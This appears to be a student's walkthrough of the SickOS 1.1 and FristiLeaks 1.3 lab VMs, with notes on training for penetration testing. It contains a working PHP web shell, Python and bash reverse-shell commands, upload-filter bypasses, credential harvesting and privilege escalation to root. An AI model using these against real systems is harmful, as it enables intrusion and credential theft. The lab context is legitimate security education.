Pen Test Assessment

Penetration Test Assessment

A penetration test assessment was a requirement of a short course on Penetration Testing from Charles Sturt University. As part of the assessment, students were provided an OVA image of a virtual machine. The virtual machine was the target of a penetration test, and students were expected to obtain flags for submission. A walkthrough of the assessment is presented here.

For the benefit of other students, the names and values of the flags have been redacted and replaced with the string REDACTED.


vulnhub.com sickos1.1

host: 192.168.56.1 dhcp-server: 192.168.56.100 kali: 192.168.56.101

* log

  # 2015/12/26 19:00 -> 19:40 (40min)

  # 2015/12/26 22:10 -> 23:50 (1hr 40min)

  # 2015/12/27 18:20 -> 18:40 (20min)

  # total time = 2hr 40min



* discovery - target

  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24

  * found: 192.168.56.102



* discovery - services

  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102

  * found: 22/tcp ssh, 3128/tcp squid (http proxy), 8080/tcp (service not identified by nmap)

  * !!exploit-db did not reveal much

  * tried: nc -n -v 192.168.56.102 3128

  * with GET /

    * found: "invalid URL" error (a forward proxy expects an absolute URI in the request line, not a bare path)

  * with GET http://127.0.0.1/

    * found: landing page with BLEHHH!!! and PHP/5.3.10-1ubuntu3.21

  * using proxy: export http_proxy="http://192.168.56.102:3128"

  * wget http://192.168.56.102/robots.txt

  * found: robots.txt points to http://192.168.56.102/wolfcms

  * !!decided to use iceweasel with proxy instead of command line

    * did not find generator metatag

    * downloaded wolfcms

      * found: README.md, requested http://192.168.56.102/wolfcms/README.md

      * found: version = 0.8.2

      * requested http://192.168.56.102/wolfcms/wolf/plugins/file_manager/file_manager.css (path taken from the downloaded source) to test for the plugin

      * found: http://192.168.56.102/wolfcms/wolf/plugins/ is also browseable

      * found: that file_manager plugin is installed

    * read 

      - https://www.wolfcms.org/download/security-patches.html

      - http://www.securityfocus.com/archive/1/521797

      - https://www.exploit-db.com/exploits/36818/

      - https://packetstormsecurity.com/files/133011/Wolf-CMS-0.8.2-Open-Redirect.html 

      - https://github.com/wolfcms/wolfcms/issues/619

    * vulnerabilities

      * file upload

      * open redirect

    * tried the default admin/admin login on Wolf CMS; it worked

    * uploaded shell.php (see appendix) through the file_manager plugin's upload function

    * http://192.168.56.102/wolfcms/public/shell.php?cmd=id

    * used shell.php 

      * found: config.php using curl http://192.168.56.102/wolfcms/public/shell.php -d cmd="cat ../config.php"

      * found: MySQL db=wolf, username=root, password=john@123

    * used curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=mysqldump -u root -pjohn@123 mysql" (--data-urlencode percent-encodes the spaces and the @ in the command; plain -d sends them raw)

      * found:

    * used shell.php to list directories

      * found: /var/www/connect.py

    * attempted python reverse shell

      * kali - nc -vvv -l -p 1234

      * sickos - curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.56.101\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'"

    * attempted to get tty, inside reverse shell

      * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'

    * tried su - sickos with the MySQL password john@123 (password reuse): worked!!

    * sudo bash

    * ls -l /root

    * cat a0216ea4d51874464078c618298b1367.txt

    





* appendix



// shell.php

-- start of shell.php --

<?php
// minimal command web shell: runs whatever arrives in ?cmd= (GET) or cmd= (POST)
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);
  echo "<pre>$cmd</pre>";
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>

-- end of shell.php --

vulnhub.com fristileaks1.3

host: 192.168.56.1 dhcp-server: 192.168.56.100 kali: 192.168.56.101

* log

  # 2015/12/24 14:45 -> 16:30 (1hr 45min)

  # 2015/12/25 15:00 -> 17:45 (2hr 45min)

  # total time = 4hrs 30min



* discovery - target

  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24

  * found target: 192.168.56.102

  

* discovery - services

  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102

  * found ports: 80



* enumerate port 80

  * wget http://192.168.56.102

  * cat index.html

  * wget http://192.168.56.102/images/keep-calm.png

  * wget http://192.168.56.102/robots.txt

    * robots.txt: disallow /cola /sisi /beer

  * wget http://192.168.56.102/cola/

    * the /cola/ page says this is not the URL and hints to drink fristi instead

  * wget http://192.168.56.102/fristi/

    * cat index.html

      * read the description meta tag and a comment mentioning base64

      * noticed a second, commented-out base64 blob

      * suspect username: eezeepz

    * extracted commented out line using vi

      * deleted other lines

      * joined all lines (:%j)

      * removed spaces (:%s/\ //g)

      * saved into fristi_img2.txt

  * base64 -d fristi_img2.txt > img2

  * file img2

  * mv img2 img2.png

  * suspect password: keKkeKKeKKeKkEkkEk
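The comment-extraction steps above (vi to join the lines and strip spaces, base64 -d, then file to identify the result), as an added Python 3 example that is not part of the original notes. SAMPLE_HTML is constructed for the example; the image in it is a generic 1x1 PNG, not the one from the VM, and the hint comment is made up. The functions take any page source, so the same code can be run on the downloaded fristi/index.html.

```python
"""Added example (not from the original post): pull base64 blobs out of
HTML comments, decode them and identify the result by magic bytes."""
import base64
import binascii
import re
from typing import List, Optional, Tuple

# (magic bytes, type), checked in order
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"PK\x03\x04", "zip"),
    (b"\x7fELF", "elf"),
]
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Constructed sample: a hint comment plus a base64 PNG split over indented
# lines, the same layout the page's fristi/index.html used.
SAMPLE_HTML = """<html><head>
<meta name="description" content="login page; images are inlined as base64">
<!-- TODO: remove before going live, eezeepz -->
</head><body>
<!--
  iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ
  AAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5E
  rkJggg==
-->
</body></html>"""


def comment_blobs(html: str) -> List[str]:
    """Each comment body that, once its lines are trimmed and joined, is one
    clean base64 string (the :%j and :%s/ //g steps done in vi above)."""
    blobs = []
    for body in COMMENT_RE.findall(html):
        joined = "".join(line.strip() for line in body.splitlines())
        if len(joined) >= 16 and B64_RE.match(joined):
            blobs.append(joined)
    return blobs


def decode_b64(blob: str) -> Optional[bytes]:
    """Strict decode; tolerate stripped '=' padding, reject anything else."""
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None


def sniff(data: bytes) -> str:
    """The 'file' step: classify by magic bytes, else printable text/unknown."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    if data and all(32 <= b < 127 or b in (9, 10, 13) for b in data):
        return "text"
    return "unknown"


def harvest(html: str) -> List[Tuple[str, bytes]]:
    """(type, decoded bytes) for every base64-looking comment in the page."""
    out = []
    for blob in comment_blobs(html):
        data = decode_b64(blob)
        if data is not None:
            out.append((sniff(data), data))
    return out


if __name__ == "__main__":
    for i, (kind, data) in enumerate(harvest(SAMPLE_HTML)):
        name = f"comment{i}.{kind}"
        with open(name, "wb") as fh:
            fh.write(data)
        print(f"wrote {name} ({len(data)} bytes)")
```

The strict regex is deliberate: a prose comment joined into one line still contains spaces and punctuation and is skipped, so only blobs that are entirely base64 get decoded and written to disk.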



* access

  * http://192.168.56.102/fristi/

  * myusername: eezeepz, mypassword: keKkeKKeKKeKkEkkEk

  * logged into http://192.168.56.102/fristi/login_success.php

  * clicked upload file link to http://192.168.56.102/fristi/upload.php

  * uploaded img2.png and got message regarding /uploads

  * verified upload location http://192.168.56.102/fristi/uploads/img2.png



* attempted shell access using weevely (failed)

  * generated weevely shell: weevely generate password shell.php

  * cp /usr/share/weevely/shell.php .

  * attempted upload: only allowed png,jpg,gif

  * mv shell.php shell.gif

  * uploaded and connected

  * weevely http://192.168.56.102/fristi/uploads/shell.gif password

  * fixed python (PySocks) issues

    * tar zxvf PySocks-1.5.6.tar.gz

    * cd PySocks-1.5.6/

    * ./setup.py build

    * ./setup.py install

  * weevely http://192.168.56.102/fristi/uploads/shell.gif password

  * unable to connect



* used old script to execute commands

  * renamed to shell.php.jpg (the upload filter only looks at the last extension; the file still runs as PHP when the handler is bound with Apache's AddHandler, which matches .php anywhere in the filename, rather than with a FilesMatch on the final extension)

  * uploaded file

  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg?cmd=id

  * uid=48(apache) gid=48(apache) groups=48(apache)

  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="cat /etc/passwd"

  * found: eezeepz, admin, fristigod, fristi

  * ls -l /home/

  * found: drwx---r-x. on eezeepz

  * ls -l /home/eezeepz

  * found: 

    * notes.txt

    * commands (various)

  * cat /home/eezeepz/notes.txt

  * found: 

    * cron runs /tmp/runthis with admin privileges every minute

    * commands chmod, df, cat, echo, ps, grep, egrep in /home/admin

    * access to /usr/bin/*

  * changed access to /home/admin

    * curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="echo '/home/admin/chmod 755 /home/admin/' > /tmp/runthis"

  * ls -las /home/admin/

  * found: cryptedpass.txt, cryptpass.py, and whoisyourgodnow.txt (owned by fristigod)

  * cat /home/admin/whoisyourgodnow.txt

  * found: =RFn0AKnlMHMPIzpyuTI0ITG

  * cat /home/admin/cryptedpass.txt

  * found: mVGZ3O3omkJLmy2pcuTq

  * cat /home/admin/cryptpass.py

  * found:

    * encodeString() base64-encodes, reverses the string, then applies rot13; since reverse and rot13 commute, undoing it is reverse, rot13, base64-decode

  * created own script to decrypt password

  * python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq

  * found: thisisalsopw123

  * python ./decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG

  * found: LetThereBeFristi!
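The password recovery above, as an added example that is not part of the original notes: instead of hard-coding the one order found in cryptpass.py, this Python 3 block tries every ordering of the three reversible layers (reverse, rot13, base64) up to a given depth and reports the chains that yield printable text. It goes beyond the specific case on purpose, for the situation where the encoder script is not available. The two ciphertexts are the ones quoted from cryptedpass.txt and whoisyourgodnow.txt.

```python
"""Added example (not from the original post): recover cleartext from an
unknown stack of reversible transforms (reverse / rot13 / base64),
generalising the single known order in cryptpass.py."""
import base64
import binascii
import codecs
import itertools
from typing import Callable, Dict, Optional, Tuple


def _b64(s: str) -> Optional[str]:
    """Strict base64 decode to ASCII text; None if this layer does not fit."""
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True).decode("ascii")
    except (binascii.Error, ValueError):
        return None


# Reversible layers a home-made "encryptor" tends to stack
TRANSFORMS: Dict[str, Callable[[str], Optional[str]]] = {
    "reverse": lambda s: s[::-1],
    "rot13": lambda s: codecs.encode(s, "rot13"),
    "b64decode": _b64,
}


def decode_with(blob: str, chain: Tuple[str, ...]) -> Optional[str]:
    """Apply the named transforms in order; None if any layer rejects its input."""
    s: Optional[str] = blob
    for name in chain:
        s = TRANSFORMS[name](s)
        if s is None:
            return None
    return s


def peel(blob: str, max_depth: int = 3) -> Dict[Tuple[str, ...], str]:
    """Try every ordering up to max_depth and keep chains that end in
    printable text and actually decoded something (contain a base64 layer),
    so merely reversing or rotating the ciphertext is not reported."""
    hits: Dict[Tuple[str, ...], str] = {}
    for depth in range(1, max_depth + 1):
        for chain in itertools.product(TRANSFORMS, repeat=depth):
            if "b64decode" not in chain:
                continue
            out = decode_with(blob, chain)
            if out and out.isprintable():
                hits[chain] = out
    return hits


if __name__ == "__main__":
    for ct in ("mVGZ3O3omkJLmy2pcuTq", "=RFn0AKnlMHMPIzpyuTI0ITG"):
        for chain, pt in peel(ct).items():
            print(ct, "->", " | ".join(chain), "->", pt)
```

Because reverse and rot13 commute, both (reverse, rot13, b64decode) and (rot13, reverse, b64decode) come back as hits for these inputs; a leading '=' in whoisyourgodnow.txt is a strong hint on its own that the base64 was reversed.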

 

* interactive shell

  * got tired of using the php script and decided to get interactive shell

  * on kali: nc -n -vvv -l -p 80

  * ran via the php script (as ?cmd=, URL-encoded): /bin/bash -i > /dev/tcp/192.168.56.101/80 0<&1 2>&1, sent as %2Fbin%2Fbash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.56.101%2F80%200%3C%261%202%3E%261

  * now have shell (without TTY, so cannot use su yet)

  * find files owned by users

    * find / -user eezeepz 2>&1 | grep -v "Permission denied"

    * find / -user admin 2>&1 | grep -v "Permission denied"

    * find / -user fristi 2>&1 | grep -v "Permission denied"

    * find / -user fristigod 2>&1 | grep -v "Permission denied"

      * found: /var/fristigod

    * found: empty mailboxes

    * found: /var/www/notes.txt 

      * not very useful since we already figured this out

  * tried to get tty shell 

    // https://pen-testing.sans.org/blog/2014/07/08/sneaky-stealthy-su-in-web-shells

    // http://netsec.ws/?p=337

  * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'

  * used: su fristigod and password: LetThereBeFristi!

  * cd /var/fristigod

  * ls -las 

  * found: .bash_history and .secret_admin_stuff

  * cat .bash_history

  * found: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

  * ls -las /var/fristigod/.secret_admin_stuff/

  * found: setuid and setgid bits set on doCom, owned by root:root

  * file /var/fristigod/.secret_admin_stuff/doCom

  * strings /var/fristigod/.secret_admin_stuff/doCom

  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

  * found: Usage: ./program_name terminal_command ...

  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id

  * found: uid=0(root) gid=100(users) groups=100(users),502(fristigod)

  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash

  !! got root !!

  * found: /root/fristileaks_secrets.txt

  * cat /root/fristileaks_secrets.txt

  * found: Flag: Y0u_kn0w_y0u_l0ve_fr1st1



# Other

* /root/.c has source for doCom

* cat /root/.mysql_history

  



* appendix

// http://snipplr.com/view/72936/simple-php-backdoor-shell/

-- start of old script -- 

<?php
// minimal command web shell: runs whatever arrives in ?cmd= (GET) or cmd= (POST)
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);
  echo "<pre>$cmd</pre>";
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>



-- end of old script





// modified cryptpass.py script

-- start of decryptpass.py script --

import base64, codecs, sys

# Encoder as found in /home/admin/cryptpass.py: base64, reverse, then rot13
# (commented out in the original; kept here as a live function for reference)
def encodeString(s):
    base64string = base64.b64encode(s.encode()).decode()
    return codecs.encode(base64string[::-1], 'rot13')

# Inverse: reverse and rot13 commute, so undo both, then base64-decode
def decodeString(s):
    rottedString = codecs.encode(s[::-1], 'rot13')
    return base64.b64decode(rottedString).decode()

if __name__ == '__main__':
    # usage: python ./decryptpass.py <ciphertext>
    print(decodeString(sys.argv[1]))

-- end of decryptpass.py script --

Metasploitable2 Walk-through

(This is an interim post and will be updated progressively. This note will be removed once done.)

This post extends the walk-through on the initial version of Metasploitable at http://nkush.blogspot.com.au/2011/09/metasploitable-walkthrough.html. It should be noted that some commands and output may have been truncated for the purposes of brevity.

Set-up

The set-up included two machines in a virtual test environment using VirtualBox. The first was a Metasploitable virtual machine (VM) and the second a Kali 1.0 VM. The two hosts were configured with a host-only network connection, so the test environment was isolated to the 192.168.32.0/24 network. All commands were executed on the Kali VM.
